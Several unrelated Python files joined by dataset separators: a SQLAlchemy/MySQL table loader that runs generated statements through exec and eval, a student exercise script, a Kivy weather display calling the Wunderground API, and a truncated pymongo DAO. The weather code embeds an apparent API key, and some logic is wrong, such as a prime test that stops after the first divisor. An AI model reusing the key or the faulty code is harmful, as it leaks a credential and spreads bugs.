code += "class {table_name}({reflection}):\n" \
.format(table_name=self.table_name, reflection="InformReflection")
code += " " * 4 + "__table__ = Table('{table_name}', {base_name}.metadata,\n".format(
table_name=self.table_name,
base_name="server_utils.mysql_base"
)
for field_order in sorted(self.fields.keys(), key=lambda x: int(x)):
field_obj = self.fields.get(field_order)
if field_obj.generated and field_obj.dflt_exp not in (None, "", "None"):
gen_field_lst.append(field_obj)
code += " " * 22 + "schema='{schema_name}')\n".format(schema_name=self.prf_name)
if bool(gen_field_lst):
for field_obj in gen_field_lst:
code += "\n"
gen_code_lst = field_obj.get_create_field()
for line in gen_code_lst:
code += " " + line + "\n"
code += "\n"
self._mapping_stmt = code
elif not bool(self.fields):
raise NotImplementedError
# endregion ########################################################################################################
# region creation_stmt ##########################################################################################
@property
@debug(lvl=logging.NOTSET)
def creation_stmt(self):
return self._creation_stmt
@creation_stmt.setter
@debug(lvl=logging.NOTSET)
def creation_stmt(self, _):
if bool(self.fields):
gen_field_lst = []
offset = 22
code = "# noinspection PyPep8Naming\n"
code += "class {0}(server_utils.mysql_base):\n" \
.format(self.table_name)
code += " " * 4 + "__table__ = Table('{table_name}', {base_name}.metadata,\n".format(
table_name=self.table_name,
base_name="server_utils.mysql_base"
)
for field_order in sorted(self.fields.keys(), key=lambda x: int(x)):
field_obj = self.fields.get(field_order)
if field_obj.generated and field_obj.dflt_exp not in (None, "", "None"):
gen_field_lst.append(field_obj)
else:
code_lst = field_obj.get_create_field()
for line in code_lst:
code += " " * offset + line + "\n"
code += " " * offset + "schema='{schema_name}')\n".format(schema_name=self.prf_name)
if bool(gen_field_lst):
for field_obj in gen_field_lst:
code += "\n"
gen_code_lst = field_obj.get_create_field()
for line in gen_code_lst:
code += " " + line + "\n"
code += "\n"
self._creation_stmt = code
elif not bool(self.fields):
raise NotImplementedError
# endregion ########################################################################################################
# noinspection PyAttributeOutsideInit
@debug(lvl=logging.NOTSET, prefix='')
def post_field_instantiation(self):
self.mapping_stmt = None
self.creation_stmt = None
@debug(lvl=logging.DEBUG, prefix='')
def exists(self):
if not server_utils.mysql_engine.dialect.has_table(
server_utils.mysql_engine,
self.table_name,
schema=self.prf_name):
ConsoleTable.logger.log(
logging.NOTSET,
"Table does not exist: {0}.{1}".format(self.prf_name, self.table_name)
)
return False
else:
ConsoleTable.logger.log(logging.NOTSET, "Table exists: {0}.{1}".format(self.prf_name, self.table_name))
return True
@debug(lvl=logging.DEBUG, prefix='')
def create_a(self):
statement = "creation_module.{table_name}.__table__.create({engine_name})" \
.format(table_name=self.table_name,
engine_name="server_utils.mysql_engine")
ConsoleTable.logger.log(logging.NOTSET, "{schema_name}.{table_name} Create Statement: {statement}".
format(schema_name=self.prf_name,
table_name=self.table_name,
statement=statement))
exec(statement)
@debug(lvl=logging.DEBUG, prefix='')
def drop(self):
statement = "creation_module.{table_name}.__table__.drop({engine_name})" \
.format(table_name=self.table_name,
engine_name="server_utils.mysql_engine")
ConsoleTable.logger.log(logging.DEBUG, "{schema_name}.{table_name} Drop Statement: {statement}".
format(schema_name=self.prf_name,
table_name=self.table_name,
statement=statement))
exec(statement)
@debug(lvl=logging.DEBUG, prefix='')
def truncate(self):
statement = ("TRUNCATE `{schema_name}`.`{table_name}`;".format(schema_name=self.prf_name,
table_name=self.table_name))
ConsoleTable.logger.log(logging.NOTSET, "{schema_name}.{table_name} Truncate Statement: {statement}".
format(schema_name=self.prf_name,
table_name=self.table_name,
statement=statement))
server_utils.mysql_engine.execute(statement)
# statement = "creation_module.{table_name}.__table__.delete({engine_name})" \
# .format(table_name=self.table_name,
# engine_name="server_utils.mysql_engine")
# exec(statement)
@debug(lvl=logging.DEBUG, prefix='')
def drop_and_create_if_not_exists(self):
if not self.exists():
self.create_a()
else:
self.drop()
self.create_a()
class ARWTable(ConsoleTable):
logger = CustomAdapter(logging.getLogger(str(__name__)), None)
@debug(lvl=logging.NOTSET, prefix='ARW Table Initiated')
def __init__(self,
session,
prf_name,
prf_col,
base_table_name,
table_name,
filepath=None,
):
super().__init__(
session=session,
prf_name=prf_name,
prf_col=prf_col,
base_table_name=base_table_name,
table_name=table_name
)
self.filepath = filepath
# region filepath #################################################################################################
@property
@debug(lvl=logging.NOTSET)
def filepath(self):
return self._filepath
@filepath.setter
@debug(lvl=logging.NOTSET)
def filepath(self, value):
try:
str_value = str(value)
except ValueError:
raise AttributeError("{0}: Value cannot be converted to string: {1}".format("filepath", value))
else:
fileroot = config.SOURCE_PATH / "cep_price_console" / "db_management"
# TODO: Production Change
filepath = str_value
# filepath = fileroot + str_value
if is_path_exists_or_creatable(filepath):
self._filepath = filepath
else:
raise AttributeError("{0}: Value is not a valid filepath: {1}".format("filepath", filepath))
# endregion ########################################################################################################
class StaticTable(ConsoleTable):
logger = CustomAdapter(logging.getLogger(str(__name__)), None)
@debug(lvl=logging.NOTSET, prefix='Static table initiated')
def __init__(self,
session,
prf_name,
prf_col,
base_table_name,
table_name,
master_table_name=None):
super().__init__(
session=session,
prf_name=prf_name,
prf_col=prf_col,
base_table_name=base_table_name,
table_name=table_name
)
self.master_table_name = master_table_name
self._append_stmt = None
# region append_stmt ##############################################################################################
@property
@debug(lvl=logging.NOTSET)
def append_stmt(self):
return self._append_stmt
@append_stmt.setter
@debug(lvl=logging.DEBUG)
def append_stmt(self, value):
self._append_stmt = value
# endregion ########################################################################################################
class CurrentTable(ARWTable):
logger = CustomAdapter(logging.getLogger(str(__name__)), None)
@debug(lvl=logging.DEBUG)
def append(self):
filepath_useful = self.filepath.replace('\\\\', '+-+-+-+-').replace('\\', '\\\\').replace('+-+-+-+-', '\\\\')
order_mapping_dict = {}
temp_field_key_list = list(self.fields.keys())
with open(filepath_useful, newline='') as csvfile:
spamreader = csv.DictReader(csvfile, delimiter=',', quotechar='"')
for row in spamreader:
for col_num, col_name in enumerate(row.keys()):
for field_key in sorted(temp_field_key_list, key=lambda x: int(x)):
field_obj = self.fields.get(field_key)
if field_obj.arw_name == col_name:
order_mapping_dict[col_num] = field_obj
temp_field_key_list.remove(field_key)
break
break
field_lst = []
set_lst = []
set_dict = {}
var_cntr_int = 0
for field_key in sorted(order_mapping_dict.keys(), key=lambda x: int(x)):
field_obj = order_mapping_dict.get(field_key)
if field_obj.logical_field == "N":
if field_obj.data_type in (
"BigInteger", "Date", "DateTime", "Float", "Integer", "Numeric", "SmallInteger", "Time"):
var_cntr_int += 1
var_str = "@var" + str(var_cntr_int)
set_dict[var_str] = field_obj
field_lst.append(" {0}".format(var_str))
elif not field_obj.generated:
# field_lst.append(" {0}".format(field_obj.column_name))
field_lst.append(" `{0}`".format(field_obj.column_name))
elif field_obj.logical_field == "Y":
if field_obj.column_name not in ("ID", "Date_Time_Stamp"):
pass
for var_str, field_obj in set_dict.items():
if field_obj.data_type in ("Date", "DateTime", "Time"):
func_str = "STR_TO_DATE"
format_str = ""
aug_var_str = var_str
if field_obj.data_type == "DateTime":
format_str = "%Y-%m-%d %H.%i.%s"
elif field_obj.data_type == "Date":
format_str = "%m/%d/%Y"
elif field_obj.data_type == "Time":
format_str = "%h:%i %p"
aug_var_str = "CONCAT(SUBSTRING({0},1,5),' ',SUBSTRING({0},6))".format(var_str)
set_lst.append(" `{col_name}` = {func_str}({aug_var_str}, '{format_str}')".format(
col_name=field_obj.column_name,
func_str=func_str,
aug_var_str=aug_var_str,
format_str=format_str
))
elif field_obj.data_type in ("BigInteger", "Float", "Integer", "Numeric", "SmallInteger"):
func_str = "NULLIF"
aug_var_str = var_str
set_lst.append(" `{col_name}` = {func_str}({aug_var_str}, '')".format(
col_name=field_obj.column_name,
func_str=func_str,
aug_var_str=aug_var_str,
))
set_stmt = ""
if len(set_dict) == 0:
pass
elif len(set_dict) > 0:
set_stmt = "\n" + ',\n'.join(map(str, set_lst)) + ",\n "
file_creation_date = creation_date(self.filepath)
filepath_useful = self.filepath.replace('\\', '\\\\')
sql = text("""
LOAD DATA LOCAL INFILE '{filename}'
INTO TABLE `{schema_name}`.`{table_name}`
FIELDS TERMINATED BY ',' OPTIONALLY ENCLOSED BY '\\"'
LINES TERMINATED BY '\\r\\n'
IGNORE 1 LINES (
{field_lst}
)
SET{set_stmt} `Date_Time_Stamp` = '{file_creation_date}';""".format(
filename=filepath_useful,
schema_name=self.prf_name,
table_name=self.table_name,
field_lst=',\n'.join(map(str, field_lst)),
set_stmt=set_stmt,
file_creation_date=file_creation_date))
self.session.execute(sql)
self.session.commit()
class ArchiveTable(ARWTable):
logger = CustomAdapter(logging.getLogger(str(__name__)), None)
@debug(lvl=logging.NOTSET, prefix='')
def __init__(self,
session,
prf_name,
prf_col,
base_table_name,
table_name,
filepath=None,
):
super().__init__(
session=session,
prf_name=prf_name,
prf_col=prf_col,
base_table_name=base_table_name,
table_name=table_name,
filepath=filepath)
self._append_stmt = None
@debug(lvl=logging.DEBUG, prefix='')
def append(self):
# noinspection PyUnusedLocal, PyUnresolvedReferences
import cep_price_console.db_management.ARW_PRF_Mapping as ARW_PRF_Mapping
query_stmt = "self.session.query(\n"
insert_stmt = "ARW_PRF_Mapping.{table_name}.__table__.insert().from_select([\n".format(
table_name=self.table_name
)
for col_num, field_obj in sorted(self.fields.items(), key=lambda x: int(x[0])):
if field_obj.column_name != 'ID':
if not field_obj.generated:
query_stmt += " ARW_PRF_Mapping.{base_table_name}_01_current.{field_name},\n".format(
base_table_name=self.base_table_name,
field_name=field_obj.column_name
)
insert_stmt += " ARW_PRF_Mapping.{table_name}.__table__.c.{field_name},\n".format(
table_name=self.table_name,
field_name=field_obj.column_name
)
query_stmt += ")"
print(query_stmt)
# noinspection PyUnusedLocal
query_obj = eval(query_stmt)
insert_stmt += " ],\n query_obj\n)"
# noinspection PyUnusedLocal
insert_obj = eval(insert_stmt)
server_utils.mysql_engine.execute(insert_obj)
@debug(lvl=logging.DEBUG, prefix='')
def max_date_time(self):
# noinspection PyUnusedLocal, PyUnresolvedReferences
import cep_price_console.db_management.ARW_PRF_Mapping as ARW_PRF_Mapping
statement = "self.session.query(func.max(ARW_PRF_Mapping.{table_name}.__table__.c.Date_Time_Stamp)).scalar()" \
.format(table_name=self.table_name)
evaluated_statement = None
try:
evaluated_statement = eval(statement)
finally:
return evaluated_statement
@debug(lvl=logging.DEBUG, prefix='')
def delete_sub_max_date_time(self):
# noinspection PyUnresolvedReferences, PyUnusedLocal
import cep_price_console.db_management.ARW_PRF_Mapping as ARW_PRF_Mapping
max_date_time_per_date_statement = \
"self.session.query(" \
"func.max(ARW_PRF_Mapping.{table_name}.__table__.c.Date_Time_Stamp).label('DateTime')," \
"func.DATE(ARW_PRF_Mapping.{table_name}.__table__.c.Date_Time_Stamp).label('Date'))." \
"group_by(func.DATE(ARW_PRF_Mapping.{table_name}.__table__.c.Date_Time_Stamp)).subquery()".format(
table_name=self.table_name)
# noinspection PyUnusedLocal
max_date_time_per_date = eval(max_date_time_per_date_statement)
id_not_max_date_time_per_date_statement = \
"self.session.query(ARW_PRF_Mapping.{table_name}.__table__.c.ID)." \
"outerjoin(max_date_time_per_date, " \
"ARW_PRF_Mapping.{table_name}.__table__.c.Date_Time_Stamp == max_date_time_per_date.c.DateTime)." \
"filter(max_date_time_per_date.c.DateTime.is_(None))".format(
table_name=self.table_name)
id_not_max_date_time_per_date = eval(id_not_max_date_time_per_date_statement)
# noinspection PyUnusedLocal
delete_list = [r[0] for r in id_not_max_date_time_per_date]
delete_not_max_id_statement = \
"ARW_PRF_Mapping.{table_name}.__table__.delete().where(" \
"ARW_PRF_Mapping.{table_name}.__table__.c.ID.in_(delete_list))".format(
table_name=self.table_name)
delete_not_max_id = eval(delete_not_max_id_statement)
server_utils.mysql_engine.execute(delete_not_max_id)
logger = CustomAdapter(logging.getLogger(str(__name__)), None)
@debug(lvl=logging.NOTSET, prefix='')
def reset_table(table_obj):
# noinspection PyUnusedLocal
drop_and_create = True
if drop_and_create:
if not server_utils.mysql_engine.dialect.has_table(server_utils.mysql_engine,
table_obj.__table__.name,
schema=table_obj.__table__.schema):
logger.log(logging.NOTSET, "Table does not exist: {schema_name}.{table_name}".format(
schema_name=table_obj.__table__.schema, table_name=table_obj.__table__.name))
table_obj.__table__.create(server_utils.mysql_engine)
else:
logger.log(logging.NOTSET, "Table exists: {schema_name}.{table_name}".format(
schema_name=table_obj.__table__.schema, table_name=table_obj.__table__.name))
table_obj.__table__.drop(server_utils.mysql_engine)
table_obj.__table__.create(server_utils.mysql_engine)
else:
statement = ("TRUNCATE `{schema_name}`.`{table_name}`;".format(schema_name=table_obj.__table__.schema,
table_name=table_obj.__table__.name))
logger.log(logging.NOTSET, "{schema_name}.{table_name} Truncate Statement: {statement}".
format(schema_name=table_obj.__table__.schema,
table_name=table_obj.__table__.name,
statement=statement))
server_utils.mysql_engine.execute(statement)
@debug(lvl=logging.DEBUG, prefix='')
def schema_exists(schema_name):
try:
server_utils.mysql_engine.execute("SHOW CREATE SCHEMA `{0}`;".format(schema_name)).scalar()
PrimaryReportFile.logger.log(logging.NOTSET, "Schema Exists: {0}".format(schema_name))
return True
except exc.DBAPIError:
PrimaryReportFile.logger.log(logging.NOTSET, "Schema Does Not Exist: {0}".format(schema_name))
return False
@debug(lvl=logging.DEBUG, prefix='')
def schema_create(schema_name):
PrimaryReportFile.logger.log(logging.NOTSET, "Creating Schema: {0}".format(schema_name))
server_utils.mysql_engine.execute(CreateSchema(schema_name))
@debug(lvl=logging.DEBUG, prefix='')
def schema_create_if_not_exists(schema_name):
if not schema_exists(schema_name):
schema_create(schema_name)
|
13,145 | c9dfa563cb1c5a00c77946ac4bc209805de42021 | # -*- coding: utf-8 -*-
"""Day 5 Python B7.ipynb
Automatically generated by Colaboratory.
Original file is located at
https://colab.research.google.com/drive/183SIqL4bd1jBHBBW0Y54EB_geafSrBbW
# Assignment 1 Day 5
"""
Listy = []
n = int(input("Enter no. of elements in the list: "))
for i in range(0,n):
element = int(input())
Listy.append(element)
print("\nThe entered list is: " + str(list(Listy)))
lst = [1,1,5]
print("The sub list is: " + str(list(lst)))
flag = set(lst).issubset(set(Listy))
j = 0
for num in range (0,n):
if Listy[num] == lst[j]:
j = j + 1
if flag and j == 3:
print("\nIt's a Match !!")
else:
print("\nIt's a Gone !!")
"""# Assignment 2 Day 5"""
def prime(n):
for i in range(2,n):
if n%i==0:
return False
else:return True
l=list(range(1,2500))
print(list(filter(prime,l)))
"""# Assignment 3 Day 5"""
lst = ["hey this is bhavana","i am in mumbai"]
getCapital = lambda sent: sent.upper()
newList = map(lambda sent: sent.upper(), lst)
print(list(newList)) |
13,146 | a697fb59a51cd243205429e4f97edfa6d397e1a3 | from kivy.clock import Clock
from kivy.uix.label import Label
from kivy.uix.widget import Widget
from kivy.uix.screenmanager import ScreenManager, Screen
from kivy.graphics import Canvas, Line, Rectangle, Ellipse, Color, Triangle
from kivy.core.window import Window
from functions.function import grid_function
import requests
import datetime
class WeatherScreen(Screen):
new_screen = True
call_draw = True
logged_data = False
error = False
for_data = ''
current_data = ''
astro_data = ''
current_time = ''
rows = 6
cols = 6
lb_time = Label(text='text')
a = Label(text='Weather') # title
b = Label(text='text: ', font_size='64sp') # current temp
c = Label(text='text') # Daily high and low
d = Label(text='text') # Daily conditions with built in word wrap
d1 = Label(text='text')
d2 = Label(text='text')
d3 = Label(text='text')
e = Label(text='text') # Daily pop and other info
e1 = Label(text='text')
e2 = Label(text='text')
f = Label(text='text') # Sun up
g = Label(text='text') # Sun Down
h = Label(text='text') # Moon up
i = Label(text='text') # Moon Down
j = Label(text='Solar: ')
k = Label(text='Lunar: ')
l = Label(text='text') # Length of Day
m = Label(text='text') # Phase of Moon
n = Label(text='text', font_size='24sp') # Date
o = Label(text='text', font_size='48sp') # Time
date_rect = ''
time_rect = ''
i0 = ''
i1 = ''
lb_day0 = Label(text='text') # Day of the week for forecast
lb_day1 = Label(text='text', font_size='24sp')
lb_day2 = Label(text='text', font_size='24sp')
lb_day3 = Label(text='text', font_size='24sp')
lb_high0 = Label(text='text') # Daily Highs
lb_high1 = Label(text='text')
lb_high2 = Label(text='text')
lb_high3 = Label(text='text')
lb_low0 = Label(text='text') # Daily Lows
lb_low1 = Label(text='text')
lb_low2 = Label(text='text')
lb_low3 = Label(text='text')
lb_pop0 = Label(text='text') # Daily Percent Chance of Precipitation
lb_pop1 = Label(text='text')
lb_pop2 = Label(text='text')
lb_pop3 = Label(text='text')
day_list = [lb_day0, lb_day1, lb_day2, lb_day3]
high_list = [lb_high0, lb_high1, lb_high2, lb_high3]
low_list = [lb_low0, lb_low1, lb_low2, lb_low3]
pop_list = [lb_pop0, lb_pop1, lb_pop2, lb_pop3]
def __init__(self, **kwargs): # commented out the clock
super(Screen, self).__init__(**kwargs)
self.setup()
def setup(self):
x, y, col_sp, row_sp, x_list, y_list = grid_function(self.cols, self.rows)
with self.canvas.before:
Rectangle(pos=(0, 0), source='images/BG_1.png', size=(x, y))
Color(0,0,0)
Line(points=(col_sp/50, y_list[0], x - col_sp/50, y_list[0], x - col_sp/50, y_list[5] + row_sp/2, col_sp/50, y_list[5] + row_sp/2, col_sp/50, y_list[0], x - col_sp/50), width=1)
Line(points=(col_sp/50, y_list[2] - row_sp/2, x - col_sp/50, y_list[2] - row_sp/2))
Line(points=(3*col_sp, y_list[2] - row_sp/2, 3*col_sp, 0))
Color(.9, .2, .2)
Line(points=(x_list[1], y_list[3] + row_sp/4, x_list[3], y_list[3] + row_sp/4), width=1.5)
Ellipse(pos=(x_list[1] - 5, y_list[3] + row_sp/4 - 5), size=(10, 10))
Ellipse(pos=(x_list[3] - 5, y_list[3] + row_sp/4 - 5), size=(10, 10))
Color(.2, .2, .9)
Line(points=(x_list[1], y_list[3] - row_sp/2, x_list[3], y_list[3] - row_sp/2), width=1.5)
Ellipse(pos=(x_list[1] - 5, y_list[3] - row_sp/2 - 5), size=(10, 10))
Ellipse(pos=(x_list[3] - 5, y_list[3] - row_sp/2 - 5), size=(10, 10))
Color(1, 1, 1)
def get_data(self):
print('getting data')
while True:
try:
# get and save weather data
# data includes current, forecast, and astronomy
c = requests.get("http://api.wunderground.com/api/1a6103aff95a0f09/conditions/q/TX/Austin.json")
f = requests.get("http://api.wunderground.com/api/1a6103aff95a0f09/forecast/q/TX/Austin.json")
a = requests.get("http://api.wunderground.com/api/1a6103aff95a0f09/astronomy/q/TX/Austin.json")
self.current_data = c.json
self.for_data = f.json
self.astro_data = a.json
self.logged_data = True
# ################################################################################################################### #
# Current Data Labels
# Current Temp
self.b.text = str(self.current_data['current_observation']['temp_f']) + 'F'
self.i0 = self.current_data['current_observation']['icon_url']
with open('images/w_icon.png', 'wb') as f:
f.write(requests.get(self.i0).content)
# Current conditions description, if statements handel word wrap
d_text = 'Conditions: ' + str(self.for_data['forecast']['txt_forecast']['forecastday'][0]['fcttext'])
if len(d_text) > 180:
self.d.text = d_text[0:60]
self.d1.text = d_text[60:120]
self.d2.text = d_text[120:180]
self.d3.text = d_text[180:]
elif len(d_text) > 120:
self.d.text = d_text[0:60]
self.d1.text = d_text[60:120]
self.d2.text = d_text[120:]
elif len(d_text) > 60:
self.d.text = d_text[0:60]
self.d1.text = d_text[60:]
else:
self.d.text = d_text
# #################################################################################################################### #
# Forecast Data Labels
i = 0
for day in self.for_data['forecast']['simpleforecast']['forecastday']:
self.day_list[i].text = day['date']['weekday']
if i == 0:
self.high_list[i].text = day['high']['fahrenheit']
self.low_list[i].text = day['low']['fahrenheit']
self.pop_list[i].text = str(day['pop'])
else:
self.high_list[i].text = 'High: ' + str(day['high']['fahrenheit']) + 'F'
self.low_list[i].text = 'Low: ' + str(day['low']['fahrenheit']) + 'F'
self.pop_list[i].text = 'POP: ' + str(day['pop']) + '%'
i += 1
self.c.text = self.high_list[0].text + 'F / ' + self.low_list[0].text + 'F'
self.e.text = 'Chance of Precipitation: ' + self.pop_list[0].text + '%'
self.e1.text = 'Avg Wind Speed: ' + str(self.for_data['forecast']['simpleforecast']['forecastday'][0]['avewind']['mph']) + 'mph'
self.e2.text = 'Avg Humidity: ' + str(self.for_data['forecast']['simpleforecast']['forecastday'][0]['avehumidity'])
# #################################################################################################################### #
# Astronomy Labels
self.f.text = 'Rise: ' + str(self.astro_data['sun_phase']['sunrise']['hour']) + ':' + \
str(self.astro_data['sun_phase']['sunrise']['minute'])
self.g.text = 'Set: ' + str(self.astro_data['sun_phase']['sunset']['hour']) + ':' + \
str(self.astro_data['sun_phase']['sunset']['minute'])
self.h.text = 'Rise: ' + str(self.astro_data['moon_phase']['moonrise']['hour']) + ':' + \
str(self.astro_data['moon_phase']['moonrise']['minute'])
self.i.text = 'Set: ' + str(self.astro_data['moon_phase']['moonset']['hour']) + ':' + \
str(self.astro_data['moon_phase']['moonset']['minute'])
self.current_time = str(self.astro_data['moon_phase']['current_time']['hour']) + ':' + \
str(self.astro_data['moon_phase']['current_time']['minute'])
sun_range = abs(int(self.astro_data['sun_phase']['sunset']['hour']) +
int(self.astro_data['sun_phase']['sunset']['minute']) / 60 -
int(self.astro_data['sun_phase']['sunrise']['hour']) -
int(self.astro_data['sun_phase']['sunrise']['minute']) / 60)
self.l.text = 'Length of Day: ' + str(round(sun_range, 2)) + 'hrs'
self.m.text = 'Phase of Moon: ' + str(self.astro_data['moon_phase']['phaseofMoon'])
break
except ConnectionError:
self.error = True
break
def get_time_date(self):
now = datetime.datetime.now()
weekdays = ['Sunday', 'Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday']
months = ['January', 'February', 'March', 'April', 'May', 'June', 'July', 'August', 'September', 'October', 'November', 'December']
day = weekdays[now.weekday()]
month = months[now.month]
self.n.text = (day + ', ' + month + ' ' + str(now.day))
minute = now.minute
if minute < 10:
minute = '0' + str(minute)
else:
minute = str(minute)
sec = now.second
if sec < 10:
sec = '0' + str(sec)
else:
sec = str(sec)
micro = str(now.microsecond)
micro = micro[:2]
self.o.text = ('%d' % now.hour + ':' + minute + ':' + sec + ':' + micro)
def static_draw(self, new_input, input_list):
x, y, col_sp, row_sp, x_list, y_list = grid_function(self.cols, self.rows)
'''self.add_widget(Label(text=self.high_list[0].text,
pos=(-x/2, -y/2 + y_list[5] - row_sp/4),
font_size='64sp')) # current temp
self.add_widget(Label(text=self.high_list[0].text + ' / ' + self.low_list[0].text,
pos=(-x/2 + self.size[0]/2, -y/2 + y_list[4] + row_sp/3),
font_size='16sp')) # current temp'''
self.canvas.clear()
with self.canvas:
Rectangle(pos=(col_sp/32, y - row_sp/3), texture=self.a.texture, size=self.a.texture.size)
Rectangle(pos=(col_sp/32, y_list[4] + 2*row_sp/3), texture=self.b.texture, size=self.b.texture.size)
Rectangle(pos=(col_sp/32 + self.b.texture.size[0]/2 - self.c.texture.size[0]/2, y_list[4] + row_sp/2),
texture=self.c.texture,
size=self.c.texture.size)
Rectangle(pos=(x_list[1] + col_sp/2, y_list[4] + 7*row_sp/12), source='images/w_icon.png', size=(75,75))
if self.d3.text != 'text':
Rectangle(pos=(x_list[2] + col_sp/2, y_list[5]), texture=self.d.texture, size=self.d.texture.size)
Rectangle(pos=(x_list[2] + col_sp/2, y_list[5] - self.d.texture.size[1]),
texture=self.d1.texture,
size=self.d1.texture.size)
Rectangle(pos=(x_list[2] + col_sp/2, y_list[5] - self.d1.texture.size[1]*2),
texture=self.d2.texture,
size=self.d2.texture.size)
Rectangle(pos=(x_list[2] + col_sp/2, y_list[5] - self.d2.texture.size[1]*3),
texture=self.d3.texture,
size=self.d3.texture.size)
elif self.d2.text != 'text':
Rectangle(pos=(x_list[2] + col_sp/2, y_list[5]), texture=self.d.texture, size=self.d.texture.size)
Rectangle(pos=(x_list[2] + col_sp/2, y_list[5] - self.d.texture.size[1]),
texture=self.d1.texture,
size=self.d1.texture.size)
Rectangle(pos=(x_list[2] + col_sp/2, y_list[5] - self.d1.texture.size[1]*2),
texture=self.d2.texture,
size=self.d2.texture.size)
elif self.d1.text != 'text':
Rectangle(pos=(x_list[2] + col_sp/2, y_list[5]), texture=self.d.texture, size=self.d.texture.size)
Rectangle(pos=(x_list[2] + col_sp/2, y_list[5] - self.d.texture.size[1]),
texture=self.d1.texture,
size=self.d1.texture.size)
else:
Rectangle(pos=(x_list[2] + col_sp/2, y_list[5]), texture=self.d.texture, size=self.d.texture.size)
# Precipitation, Wind, and Humity
Rectangle(pos=(col_sp/32, y_list[4]), texture=self.e.texture, size=self.e.texture.size)
Rectangle(pos=(col_sp/32, y_list[4] - self.e.texture.size[1]), texture=self.e1.texture, size=self.e1.texture.size)
Rectangle(pos=(col_sp/32, y_list[4] - self.e.texture.size[1]*2), texture=self.e2.texture, size=self.e2.texture.size)
# ASTRONOMY TITLES, Solar Title(j) nad Lunar Title(k)
Rectangle(pos=(col_sp/32, y_list[3] + row_sp/4 - 10), texture=self.j.texture, size=self.j.texture.size)
Rectangle(pos=(col_sp/32, y_list[3] - row_sp/2 - 10), texture=self.k.texture, size=self.k.texture.size)
# End segments of solar line (x_list[1], y_list[3] + row_sp/4) and (x_list[3], y_list[3] + row_sp/4)
# End segments of lunar line (x_list[1], y_list[3] - row_sp/2) and (x_list[3], y_list[3] - row_sp/2)
# Sun up(f) Sun down(g) Moon up(h) Moon down(i)
Rectangle(pos=(x_list[1] - self.f.texture.size[0]/2, y_list[3]), texture=self.f.texture, size=self.f.texture.size)
Rectangle(pos=(x_list[3] - self.g.texture.size[0]/2, y_list[3]), texture=self.g.texture, size=self.g.texture.size)
Rectangle(pos=(x_list[1] - self.h.texture.size[0]/2, y_list[3] - .75*row_sp), texture=self.h.texture, size=self.h.texture.size)
Rectangle(pos=(x_list[3] - self.i.texture.size[0]/2, y_list[3] - .75*row_sp), texture=self.i.texture, size=self.i.texture.size)
# Show current sun and moon location
sun_range = abs(int(self.astro_data['sun_phase']['sunset']['hour']) +
int(self.astro_data['sun_phase']['sunset']['minute']) / 60 -
int(self.astro_data['sun_phase']['sunrise']['hour']) -
int(self.astro_data['sun_phase']['sunrise']['minute']) / 60)
moon_range = abs(int(self.astro_data['moon_phase']['moonset']['hour']) +
int(self.astro_data['moon_phase']['moonset']['minute']) / 60 -
int(self.astro_data['moon_phase']['moonrise']['hour']) -
int(self.astro_data['moon_phase']['moonrise']['minute']) / 60)
s_calc_time = abs(int(self.astro_data['moon_phase']['current_time']['hour']) +
int(self.astro_data['moon_phase']['current_time']['minute']) / 60 -
int(self.astro_data['sun_phase']['sunrise']['hour']) -
int(self.astro_data['sun_phase']['sunrise']['minute']) / 60)
m_calc_time = abs(int(self.astro_data['moon_phase']['current_time']['hour']) +
int(self.astro_data['moon_phase']['current_time']['minute']) / 60 -
int(self.astro_data['moon_phase']['moonrise']['hour']) -
int(self.astro_data['moon_phase']['moonrise']['minute']) / 60)
sun_pct = s_calc_time / sun_range
moon_pct = m_calc_time / moon_range
if sun_pct < 1:
Color(.9, .2, .2)
Line(points=(3*col_sp*sun_pct, y_list[3] + row_sp/4 + row_sp/8, 3*col_sp*sun_pct, y_list[3] + row_sp/4 - row_sp/8), width=1.5)
if moon_pct < 1:
Color(.2, .2, .9)
Line(points=(3*col_sp*moon_pct, y_list[3] - row_sp/2 + row_sp/8, 3*col_sp*moon_pct, y_list[3] - row_sp/2 - row_sp/8), width=1.5)
Color(1, 1, 1)
Rectangle(pos=(x_list[4] - col_sp/4, y_list[3] + row_sp/4 - 10), texture=self.l.texture, size=self.l.texture.size)
Rectangle(pos=(x_list[4] - col_sp/4, y_list[3] - row_sp/2 - 10), texture=self.m.texture, size=self.m.texture.size)
for i in range(1, len(self.day_list)):
Rectangle(pos=(col_sp/32 + 1*col_sp*(i-1), y_list[1] + row_sp/6), texture=self.day_list[i].texture, size=self.day_list[i].texture.size)
Rectangle(pos=(col_sp/32 + 1*col_sp*(i-1), y_list[1] - row_sp/4), texture=self.high_list[i].texture, size=self.high_list[i].texture.size)
Rectangle(pos=(col_sp/32 + 1*col_sp*(i-1), y_list[1] - row_sp/4 - self.low_list[i].texture.size[1]), texture=self.low_list[i].texture, size=self.low_list[i].texture.size)
Rectangle(pos=(col_sp/32 + 1*col_sp*(i-1), y_list[1] - row_sp/4 - self.low_list[i].texture.size[1]*2), texture=self.pop_list[i].texture, size=self.pop_list[i].texture.size)
self.date_rect = Rectangle(pos=(x_list[3] + col_sp/2, y_list[1] + row_sp/6), texture=self.n.texture, size=self.n.texture.size)
self.time_rect = Rectangle(pos=(self.date_rect.pos[0] + (self.n.texture.size[0] - self.o.texture.size[0])/2, y_list[1] - self.o.texture.size[1]), texture=self.o.texture, size=self.o.texture.size)
def dynamic_draw(self):
self.date_rect.texture = self.n.texture
self.date_rect.size = self.n.texture.size
self.time_rect.texture = self.o.texture
self.time_rect.size = self.o.texture.size
def update(self, new_input, input_list):
if not self.error:
self.get_time_date()
print('A')
if self.logged_data:
if self.call_draw:
self.static_draw(new_input, input_list)
self.call_draw = False
self.dynamic_draw()
if self.new_screen:
print('B')
self.get_data()
self.logged_data = True
self.new_screen = False
else:
self.add_widget(Label(text='Failed to Fetch Data'))
print('C')
if new_input:
if input_list[3] == 1:
self.logged_data = False
self.new_screen = True
self.call_draw = True
print('end weather update')
return [1, 'menu']
print('end weather update')
return [0, 'weather']
|
13,147 | 0760d755324239ff91e19d977cd31cf3a07e9fd8 | import yaml
from datetime import datetime
from pymongo import MongoClient
from utils import config
# read configuration
cfg = config()
# open DB connection
mongo = MongoClient(cfg['mongo']['host'], cfg['mongo']['port'])
db = mongo.teryt
# functions to manipulate county collection
class CountyDAO:
# get all
def find_all(self):
cursor = db.county.find()
result = []
for c in cursor:
data = {}
data['id'] = c['id']
data['name'] = c['name']
data['href'] = 'asdasdasda'
result.append(data)
return result
# save city
def save(self, id, name, timestamp):
return db.county.insert_one(
{
"id" : id,
"name" : name,
